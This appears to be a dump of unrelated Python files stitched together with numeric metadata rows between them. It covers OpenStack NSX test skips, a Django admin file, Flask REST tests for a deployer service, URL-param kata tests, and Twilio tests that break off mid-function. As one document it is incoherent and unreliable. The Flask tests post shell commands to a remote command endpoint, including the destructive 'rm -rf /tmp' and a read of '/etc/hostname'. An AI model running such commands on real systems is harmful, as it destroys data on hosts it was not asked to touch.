def test_create_networks_bulk_emulated_plugin_failure(self):
self.skipTest("The test is not suitable for the metadata test case")
class TestSubnetsWithMdV2(test_plugin.TestSubnetsV2,
NsxVPluginWithMdV2TestCase):
# Skip all the tests that count subnets, as there is an
# additional internal subnet for metadata.
def test_list_subnets_with_sort_native(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_subnets_with_sort_emulated(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_subnets_with_pagination_native(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_subnets_with_parameter(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_subnets_with_pagination_emulated(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_subnets_shared(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_list_subnets(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_create_subnets_bulk_native_plugin_failure(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_create_subnets_bulk_native_quotas(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_create_subnets_bulk_emulated_plugin_failure(self):
self.skipTest("The test is not suitable for the metadata test case")
class TestExclusiveRouterWithMdTestCase(
test_plugin.TestExclusiveRouterTestCase,
NsxVPluginWithMdV2TestCase):
# Skip all the tests that count firewall rules, as there are
# some MD specific rules
def test_router_set_gateway_with_nosnat(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_interfaces_different_tenants_update_firewall(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_interfaces_with_update_firewall(self):
self.skipTest("The test is not suitable for the metadata test case")
# Skip all the tests that count routers or ports, as there is
# an additional router for the md proxy
def test_router_list_with_pagination_reverse(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_list_with_sort(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_list_with_pagination(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_list(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_add_interface_delete_port_after_failure(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_create_router_fail_at_the_backend(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_floatingip_delete_router_intf_with_subnet_id_returns_409(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_floatingip_delete_router_intf_with_port_id_returns_409(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_address_scope_snat_rules(self):
self.skipTest("The test is not suitable for the metadata test case")
class TestVdrWithMdTestCase(test_plugin.TestVdrTestCase,
NsxVPluginWithMdV2TestCase):
# Skip all the tests that count firewall rules, as there are
# some MD specific rules
def test_router_set_gateway_with_nosnat(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_interfaces_different_tenants_update_firewall(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_interfaces_with_update_firewall(self):
self.skipTest("The test is not suitable for the metadata test case")
# Skip all the tests that count routers or ports, as there is
# an additional router for the md proxy
def test_router_list_with_pagination_reverse(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_list_with_sort(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_list_with_pagination(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_list(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_add_interface_delete_port_after_failure(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_create_router_fail_at_the_backend(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_floatingip_delete_router_intf_with_subnet_id_returns_409(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_floatingip_delete_router_intf_with_port_id_returns_409(self):
self.skipTest("The test is not suitable for the metadata test case")
# TODO(asarfaty): fix some mocks so those tests will pass
def test_router_plr_binding_default_size(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_plr_binding_configured_size(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_plr_binding_default_az(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_plr_binding_with_az(self):
self.skipTest("The test is not suitable for the metadata test case")
class TestSharedRouterWithMdTestCase(test_plugin.TestSharedRouterTestCase,
NsxVPluginWithMdV2TestCase):
# Skip all the tests that count firewall rules, as there are
# some MD specific rules
def test_router_set_gateway_with_nosnat(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_routers_set_gateway_with_nosnat(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_interfaces_different_tenants_update_firewall(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_interfaces_with_update_firewall(self):
self.skipTest("The test is not suitable for the metadata test case")
# Skip all the tests that count routers or ports, as there is
# an additional router for the md proxy
def test_router_list_with_pagination_reverse(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_list_with_sort(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_list_with_pagination(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_list(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_router_add_interface_delete_port_after_failure(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_create_router_fail_at_the_backend(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_floatingip_delete_router_intf_with_subnet_id_returns_409(self):
self.skipTest("The test is not suitable for the metadata test case")
def test_floatingip_delete_router_intf_with_port_id_returns_409(self):
self.skipTest("The test is not suitable for the metadata test case")
| 43.385965
| 77
| 0.741448
| 1,805
| 12,365
| 4.852632
| 0.12133
| 0.047951
| 0.118735
| 0.140998
| 0.806028
| 0.803516
| 0.779998
| 0.76527
| 0.761502
| 0.752826
| 0
| 0.006139
| 0.196442
| 12,365
| 284
| 78
| 43.538732
| 0.875403
| 0.127457
| 0
| 0.63253
| 0
| 0
| 0.328776
| 0.009022
| 0
| 0
| 0
| 0.003521
| 0
| 1
| 0.39759
| false
| 0
| 0.036145
| 0
| 0.46988
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
97c9e99ee512ec002debce3bb8e185802e2001eb
| 112
|
py
|
Python
|
saas/dataops/api/dataset/APP-META-PRIVATE/postrun/dataset/entry.py
|
iuskye/SREWorks
|
a2a7446767d97ec5f6d15bd00189c42150d6c894
|
[
"Apache-2.0"
] | 407
|
2022-03-16T08:09:38.000Z
|
2022-03-31T12:27:10.000Z
|
saas/dataops/api/dataset/APP-META-PRIVATE/postrun/dataset/entry.py
|
Kwafoor/SREWorks
|
37a64a0a84b29c65cf6b77424bd2acd0c7b42e2b
|
[
"Apache-2.0"
] | 25
|
2022-03-22T04:27:31.000Z
|
2022-03-30T08:47:28.000Z
|
saas/dataops/api/dataset/APP-META-PRIVATE/postrun/dataset/entry.py
|
Kwafoor/SREWorks
|
37a64a0a84b29c65cf6b77424bd2acd0c7b42e2b
|
[
"Apache-2.0"
] | 109
|
2022-03-21T17:30:44.000Z
|
2022-03-31T09:36:28.000Z
|
# coding: utf-8
from . import dataset_interface_init
def init():
dataset_interface_init.add_interfaces()
| 14
| 43
| 0.758929
| 15
| 112
| 5.333333
| 0.733333
| 0.4
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010526
| 0.151786
| 112
| 7
| 44
| 16
| 0.831579
| 0.116071
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
c1b8b52086119756d69b9ade1801ddf2513d8aeb
| 159
|
py
|
Python
|
product/admin.py
|
MohammadReza-Jafari/Gizshop_local_api
|
217b841995462540f4b20ea9a3c525097a0ff347
|
[
"MIT"
] | null | null | null |
product/admin.py
|
MohammadReza-Jafari/Gizshop_local_api
|
217b841995462540f4b20ea9a3c525097a0ff347
|
[
"MIT"
] | 8
|
2021-04-08T21:57:39.000Z
|
2022-03-12T00:45:22.000Z
|
product/admin.py
|
MohammadReza-Jafari/Gizshop_local_api
|
217b841995462540f4b20ea9a3c525097a0ff347
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from . import models
admin.site.register(models.Product)
admin.site.register(models.Color)
admin.site.register(models.Image)
| 22.714286
| 35
| 0.81761
| 23
| 159
| 5.652174
| 0.478261
| 0.207692
| 0.392308
| 0.530769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075472
| 159
| 6
| 36
| 26.5
| 0.884354
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
de1595644c6df1e3df752abbaf74c8d2112ba14b
| 17,995
|
py
|
Python
|
tests/rest_kubectl/flask_rest_test.py
|
estuaryoss/estuary-deployer
|
21f5c4d54122ad8e0cd8f881fc6481b8b30fa432
|
[
"Apache-2.0"
] | 1
|
2021-04-05T11:12:08.000Z
|
2021-04-05T11:12:08.000Z
|
tests/rest_kubectl/flask_rest_test.py
|
estuaryoss/estuary-deployer
|
21f5c4d54122ad8e0cd8f881fc6481b8b30fa432
|
[
"Apache-2.0"
] | null | null | null |
tests/rest_kubectl/flask_rest_test.py
|
estuaryoss/estuary-deployer
|
21f5c4d54122ad8e0cd8f881fc6481b8b30fa432
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
import unittest
import requests
import yaml
from flask import json
from parameterized import parameterized
from requests_toolbelt.utils import dump
from rest.api.constants.api_code import ApiCode
from rest.api.responsehelpers.error_message import ErrorMessage
class FlaskServerTestCase(unittest.TestCase):
server_base = "http://localhost:8080"
server = "{}/kubectl".format(server_base)
expected_version = "4.2.3"
sleep_before_container_up = 5
def test_env_endpoint(self):
response = requests.get(self.server + "/env")
body = json.loads(response.text)
self.assertEqual(response.status_code, 200)
self.assertGreaterEqual(len(body.get('description')), 7)
self.assertIn("/variables", body.get('description')["VARS_DIR"])
# self.assertEqual(body.get('message')["TEMPLATES_DIR"], "/data")
self.assertEqual(body.get('message'), ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
@parameterized.expand([
("ENV_TYPE", "DOCKER")
])
def test_env_load_from_props(self, env_var, expected_value):
response = requests.get(self.server + "/env/" + env_var)
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get("message"), ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
self.assertEqual(body.get('description'), expected_value)
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
self.assertIsNotNone(body.get('path'))
def test_setenv_endpoint_jsonwithvalues_p(self):
payload = {"a": "b", "FOO2": "BAR1"}
headers = {'Content-type': 'application/json'}
response = requests.post(self.server + "/env", data=json.dumps(payload),
headers=headers)
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('description'), payload)
self.assertEqual(body.get("message"), ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
self.assertIsNotNone(body.get('path'))
def test_ping_endpoint(self):
response = requests.get(self.server + "/ping")
body = response.json()
headers = response.headers
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('description'), "pong")
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
self.assertEqual(body.get('path'), "/kubectl/ping?")
self.assertEqual(len(headers.get('X-Request-ID')), 16)
def test_ping_endpoint_xid_set_by_client(self):
xid = 'whatever'
headers = {'X-Request-ID': xid}
response = requests.get(self.server + "/ping", headers=headers)
body = json.loads(response.text)
headers = response.headers
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('description'), "pong")
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
self.assertEqual(headers.get('X-Request-ID'), xid)
def test_about_endpoint(self):
response = requests.get(self.server + "/about")
name = "estuary-deployer"
body = json.loads(response.text)
self.assertEqual(response.status_code, 200)
self.assertIsInstance(body.get('description'), dict)
self.assertEqual(body.get('message'), ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('name'), name)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
def test_about_endpoint_unauthorized(self):
headers = {'Token': "invalidtoken"}
response = requests.get(self.server + "/about", headers=headers)
service_name = "estuary-deployer"
body = response.json()
headers = response.headers
self.assertEqual(response.status_code, 401)
self.assertEqual(body.get('description'), "Invalid Token")
self.assertEqual(body.get('name'), service_name)
self.assertEqual(body.get('message'), ErrorMessage.HTTP_CODE.get(ApiCode.UNAUTHORIZED.value))
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.UNAUTHORIZED.value)
self.assertIsNotNone(body.get('timestamp'))
self.assertEqual(len(headers.get('X-Request-ID')), 16)
# def test_swagger_endpoint(self):
# response = requests.get(self.server_base + "/apidocs")
#
# body = response.text
# self.assertEqual(response.status_code, 200)
# self.assertTrue(body.find("html") >= 0)
#
# def test_swagger_endpoint_swagger_still_accessible(self):
# headers = {'Token': 'whateverinvalid'}
# response = requests.get(self.server_base + "/apidocs", headers=headers)
#
# body = response.text
# self.assertEqual(response.status_code, 200)
# self.assertTrue(body.find("html") >= 0)
#
# def test_swagger_yml_endpoint(self):
# response = requests.get(self.server + "/swagger/swagger.json")
#
# self.assertEqual(response.status_code, 200)
#
# def test_swagger_yml_swagger_still_accessible(self):
# headers = {'Token': 'whateverinvalid'}
# response = requests.get(self.server + "/swagger/swagger.json", headers=headers)
#
# self.assertEqual(response.status_code, 200)
@parameterized.expand([
("json.j2", "json.json"),
("yml.j2", "yml.yml")
])
def test_rend_endpoint_p(self, template, variables):
response = requests.get(self.server + f"/render/{template}/{variables}")
body = yaml.safe_load(response.text)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(body), 3)
@parameterized.expand([
("json.j2", "doesnotexists.json"),
("yml.j2", "doesnotexists.yml")
])
def test_rend_endpoint_missing_variables_n(self, template, variables):
expected = "Exception([Errno 2] No such file or directory:"
response = requests.get(self.server + f"/render/{template}/{variables}")
body = response.json()
self.assertEqual(response.status_code, 500)
self.assertIn(expected, body.get("description"))
@parameterized.expand([
("doesnotexists.j2", "json.json"),
("doesnotexists.j2", "yml.yml")
])
def test_rend_endpoint_missing_template_n(self, template, variables):
expected = f"Exception({template})"
response = requests.get(self.server + f"/render/{template}/{variables}")
body = response.json()
self.assertEqual(response.status_code, 500)
self.assertEqual(expected, body.get("description"))
# @parameterized.expand([
# ("standalone.yml", "variables.yml")
# ])
# @unittest.skipIf(os.environ.get('TEMPLATES_DIR') == "inputs/templates", "Skip on VM")
# def test_rendwithenv_endpoint(self, template, variables):
# payload = {'DATABASE': 'mysql56', 'IMAGE': 'latest'}
# headers = {'Content-type': 'application/json'}
#
# response = requests.post(self.server + f"/render/{template}/{variables}", data=json.dumps(payload),
# headers=headers)
#
# print(dump.dump_all(response))
# body = yaml.safe_load(response.text)
# self.assertEqual(response.status_code, 200)
# self.assertEqual(len(body.get("services")), 2)
# self.assertEqual(int(body.get("version")), 3)
def test_getdeployerfile_p(self):
headers = {
'Content-type': 'application/json',
'File-Path': '/etc/hostname'
}
response = requests.get(self.server + f"/file", headers=headers)
self.assertEqual(response.status_code, 200)
self.assertGreater(len(response.text), 0)
def test_getdeployerfile_n(self):
headers = {
'Content-type': 'application/json',
'File-Path': '/etc/dummy'
}
response = requests.get(self.server + f"/file", headers=headers)
body = response.json()
headers = response.headers
self.assertEqual(response.status_code, 500)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.GET_FILE_FAILURE.value))
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.GET_FILE_FAILURE.value)
self.assertIsNotNone(body.get('timestamp'))
self.assertEqual(len(headers.get('X-Request-ID')), 16)
def test_getdeployerfile_missing_param_n(self):
header_key = 'File-Path'
headers = {'Content-type': 'application/json'}
response = requests.post(self.server + f"/file", headers=headers)
body = response.json()
self.assertEqual(response.status_code, 500)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.HTTP_HEADER_NOT_PROVIDED.value) % header_key)
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.HTTP_HEADER_NOT_PROVIDED.value)
self.assertIsNotNone(body.get('timestamp'))
def test_getenv_endpoint_p(self):
env_var = "VARS_DIR"
response = requests.get(self.server + f"/env/{env_var}")
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('message'), ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
self.assertIsNotNone(body.get('description'))
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
def test_getenv_endpoint_n(self):
env_var = "alabalaportocala"
response = requests.get(self.server + f"/env/{env_var}")
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('message'), ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
self.assertEqual(body.get('description'), None)
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
@parameterized.expand([
"{\"file\": \"/dummy/config.properties\", \"content\": \"ip=10.0.0.1\\nrequest_sec=100\\nthreads=10\\ntype=dual\"}"
])
def test_uploadfile_missing_header_n(self, payload):
headers = {'Content-type': 'application/json'}
mandatory_header_key = 'File-Path'
response = requests.post(
self.server + f"/file",
data=payload, headers=headers)
body = response.json()
print(dump.dump_all(response))
self.assertEqual(response.status_code, 500)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.HTTP_HEADER_NOT_PROVIDED.value) % mandatory_header_key)
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.HTTP_HEADER_NOT_PROVIDED.value)
self.assertIsNotNone(body.get('timestamp'))
@parameterized.expand([
""
])
def test_uploadfile_empty_body_n(self, payload):
headers = {
'Content-type': 'application/json',
'File-Path': '/tmp/config.properties'
}
response = requests.post(
self.server + f"/file",
data=payload, headers=headers)
body = response.json()
print(dump.dump_all(response))
self.assertEqual(response.status_code, 500)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.EMPTY_REQUEST_BODY_PROVIDED.value))
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.EMPTY_REQUEST_BODY_PROVIDED.value)
self.assertIsNotNone(body.get('timestamp'))
@parameterized.expand([
"{\"file\": \"/tmp/config.properties\", \"content\": \"ip=10.0.0.1\\nrequest_sec=100\\nthreads=10\\ntype=dual\"}"
])
def test_uploadfile_p(self, payload):
headers = {
'Content-type': 'application/json',
'File-Path': 'config.properties'
}
response = requests.put(
self.server + f"/file",
data=payload, headers=headers)
body = response.json()
print(dump.dump_all(response))
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
def test_executecommand_n(self):
command = "abracadabra" # not working on linux
response = requests.post(
self.server + f"/command",
data=command)
body = response.json()
print(dump.dump_all(response))
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertNotEqual(body.get('description').get('commands').get(command).get('details').get('code'), 0)
self.assertEqual(body.get('description').get('commands').get(command).get('details').get('out'), "")
self.assertNotEqual(body.get('description').get('commands').get(command).get('details').get('err'), "")
self.assertGreater(body.get('description').get('commands').get(command).get('details').get('pid'), 0)
self.assertIsInstance(body.get('description').get('commands').get(command).get('details').get('args'), list)
self.assertIsNotNone(body.get('timestamp'))
def test_executecommand_p(self):
command = "cat /etc/hostname"
response = requests.post(
self.server + f"/command",
data=command)
body = response.json()
print(dump.dump_all(response))
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertEqual(body.get('description').get('commands').get(command).get('details').get('code'), 0)
self.assertNotEqual(body.get('description').get('commands').get(command).get('details').get('out'), "")
self.assertEqual(body.get('description').get('commands').get(command).get('details').get('err'), "")
self.assertGreater(body.get('description').get('commands').get(command).get('details').get('pid'), 0)
self.assertIsInstance(body.get('description').get('commands').get(command).get('details').get('args'), list)
self.assertIsNotNone(body.get('timestamp'))
def test_executecommand_rm_allowed_p(self):
command = "rm -rf /tmp"
response = requests.post(
self.server + f"/command",
data=command)
body = response.json()
print(dump.dump_all(response))
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
self.assertIsInstance(body.get('description'), dict)
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
def test_both_valid_are_executed(self):
command = "rm -rf /tmp\nls -lrt"
commands = command.split("\n")
response = requests.post(
self.server + f"/command",
data=command)
body = response.json()
print(dump.dump_all(response))
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
self.assertEqual(len(body.get('description').get("commands")), 2) # both commands are executed
self.assertEqual(body.get('description').get("commands").get(commands[1]).get('details').get('code'), 0)
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
def test_executecommand_timeout_from_client_n(self):
command = "sleep 20"
# assertRaises ensures the test fails if the client-side timeout never fires
with self.assertRaises(requests.exceptions.ReadTimeout):
requests.post(self.server + f"/command", data=command, timeout=2)
if __name__ == '__main__':
unittest.main()
| 43.153477
| 123
| 0.643957
| 2,011
| 17,995
| 5.653904
| 0.111885
| 0.063412
| 0.11029
| 0.127704
| 0.830959
| 0.80985
| 0.783201
| 0.757168
| 0.735796
| 0.698769
| 0
| 0.010171
| 0.20778
| 17,995
| 416
| 124
| 43.257212
| 0.787388
| 0.094693
| 0
| 0.621359
| 0
| 0
| 0.1268
| 0.008187
| 0
| 0
| 0
| 0
| 0.417476
| 1
| 0.074434
| false
| 0
| 0.02589
| 0
| 0.116505
| 0.022654
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a9d1dc8a4fff9c7dbea4cccacdcd4d1e2990cd3e
| 948
|
py
|
Python
|
tests/kyu_4_tests/test_strip_url_params.py
|
the-zebulan/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | 40
|
2016-03-09T12:26:20.000Z
|
2022-03-23T08:44:51.000Z
|
tests/kyu_4_tests/test_strip_url_params.py
|
akalynych/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | null | null | null |
tests/kyu_4_tests/test_strip_url_params.py
|
akalynych/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | 36
|
2016-11-07T19:59:58.000Z
|
2022-03-31T11:18:27.000Z
|
import unittest
from katas.kyu_4.strip_url_params import strip_url_params
class StripURLParamsTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(strip_url_params('www.codewars.com?a=1&b=2&a=1&b=3'),
'www.codewars.com?a=1&b=2')
def test_equals_2(self):
self.assertEqual(strip_url_params('www.codewars.com?a=1&b=2&a=1&b=3',
['b']), 'www.codewars.com?a=1')
def test_equals_3(self):
self.assertEqual(strip_url_params('www.codewars.com?a=1&b=2&a=2'),
'www.codewars.com?a=1&b=2')
def test_equals_4(self):
self.assertEqual(strip_url_params('www.codewars.com?a=1&b=2&a=2',
['b']), 'www.codewars.com?a=1')
def test_equals_5(self):
self.assertEqual(strip_url_params('www.codewars.com', ['b']),
'www.codewars.com')
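# For reference, a minimal implementation consistent with the expectations
# above (a hypothetical sketch -- the real solution lives in
# katas.kyu_4.strip_url_params and may differ):
#
#     def strip_url_params(url, params_to_strip=None):
#         params_to_strip = params_to_strip or []
#         base, _, query = url.partition('?')
#         seen, kept = set(), []
#         for pair in (query.split('&') if query else []):
#             name = pair.split('=')[0]
#             # keep only the first occurrence of each param, unless stripped
#             if name in seen or name in params_to_strip:
#                 continue
#             seen.add(name)
#             kept.append(pair)
#         return base + '?' + '&'.join(kept) if kept else base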
| 36.461538
| 78
| 0.574895
| 139
| 948
| 3.748201
| 0.18705
| 0.211132
| 0.268714
| 0.230326
| 0.738964
| 0.738964
| 0.738964
| 0.738964
| 0.738964
| 0.533589
| 0
| 0.036179
| 0.271097
| 948
| 25
| 79
| 37.92
| 0.7178
| 0
| 0
| 0.222222
| 0
| 0.111111
| 0.256329
| 0.177215
| 0
| 0
| 0
| 0
| 0.277778
| 1
| 0.277778
| false
| 0
| 0.111111
| 0
| 0.444444
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a9d6e01352f313e23504ba1f56e0152af4ccbbab
| 9,129
|
py
|
Python
|
tests/integration/voice/v1/connection_policy/test_connection_policy_target.py
|
BrimmingDev/twilio-python
|
3226b5fed92b3c2ce64f03e6b19fc4792ef7647f
|
[
"MIT"
] | 1,362
|
2015-01-04T10:25:18.000Z
|
2022-03-24T10:07:08.000Z
|
tests/integration/voice/v1/connection_policy/test_connection_policy_target.py
|
BrimmingDev/twilio-python
|
3226b5fed92b3c2ce64f03e6b19fc4792ef7647f
|
[
"MIT"
] | 299
|
2015-01-30T09:52:39.000Z
|
2022-03-31T23:03:02.000Z
|
tests/integration/voice/v1/connection_policy/test_connection_policy_target.py
|
BrimmingDev/twilio-python
|
3226b5fed92b3c2ce64f03e6b19fc4792ef7647f
|
[
"MIT"
] | 622
|
2015-01-03T04:43:09.000Z
|
2022-03-29T14:11:00.000Z
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class ConnectionPolicyTargetTestCase(IntegrationTestCase):
def test_create_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.voice.v1.connection_policies("NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.targets.create(target="https://example.com")
values = {'Target': "https://example.com", }
self.holodeck.assert_has_request(Request(
'post',
'https://voice.twilio.com/v1/ConnectionPolicies/NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Targets',
data=values,
))
def test_create_response(self):
self.holodeck.mock(Response(
201,
'''
{
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"connection_policy_sid": "NYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"sid": "NEaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "friendly_name",
"target": "sip:sip-box.com:1234",
"priority": 1,
"weight": 20,
"enabled": true,
"date_created": "2020-03-18T23:31:36Z",
"date_updated": "2020-03-18T23:31:36Z",
"url": "https://voice.twilio.com/v1/ConnectionPolicies/NYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Targets/NEaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
'''
))
actual = self.client.voice.v1.connection_policies("NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.targets.create(target="https://example.com")
self.assertIsNotNone(actual)
def test_fetch_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
